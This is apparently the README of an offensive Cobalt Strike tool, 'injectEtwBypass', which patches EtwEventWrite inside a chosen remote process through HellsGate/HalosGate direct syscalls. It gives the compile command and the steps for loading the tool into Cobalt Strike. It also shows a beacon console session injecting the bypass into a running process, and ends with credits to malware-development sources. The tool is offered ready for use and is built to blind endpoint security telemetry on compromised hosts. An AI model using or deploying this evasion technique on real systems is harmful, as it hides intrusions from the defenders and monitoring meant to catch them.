Cobalt Strike BOF - Inject ETW Bypass
Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)
Running InjectEtwBypass BOF from CobaltStrike to Bypass ETW in Notepad.exe
Compile with x64 MinGW:
cat compile.sh
x86_64-w64-mingw32-gcc -m64 -mwindows -c injectEtwBypass.c -o injectEtwBypass.o \
-masm=intel -Wall -fno-asynchronous-unwind-tables -nostdlib -fno-ident -Wl,-Tlinker.ld,--no-seh
bash compile.sh
Run from Cobalt Strike Beacon Console
- After compiling
injectEtwBypass.o
, load theinjectEtwBypass.cna
script into Cobalt Strikes via the Script Manager - Once loaded into Cobalt Strike, you can use the command from the interactive beacon console:
beacon> help
injectEtwBypass - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)
beacon> help injectEtwBypass
Synopsis: injectEtwBypass PID
beacon> injectEtwBypass 8968
[*] Inject ETW Bypass (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
[+] host called home, sent: 2336 bytes
[+] received output:
Injecting NTDLL.EtwEventWrite bypass in remote process: 8968 (PID)
Credits / References
Adam Chester (@_xpn_) of TrustedSec
ETW Bypass Massive Credits toChetan Nayak (@NinjaParanoid)
Creating Shellcode BOFs with CHalosGate SysCaller
- Reenz0h from @SEKTOR7net
- Most of the C techniques I use are from Reenz0h's awesome Sektor7 courses & blogs
- Best classes for malware development out there.
- Creator of the halos gate technique. His work was the motivation for this work.
- Sektor7 HalosGate Blog
HellsGate Syscaller
- @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique )
- Could not have made my implementation of HellsGate without them :)
- Awesome work on this method, really enjoyed working through it myself. Thank you!
- HellsGate Github Repo
- Link to the Hell's Gate paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf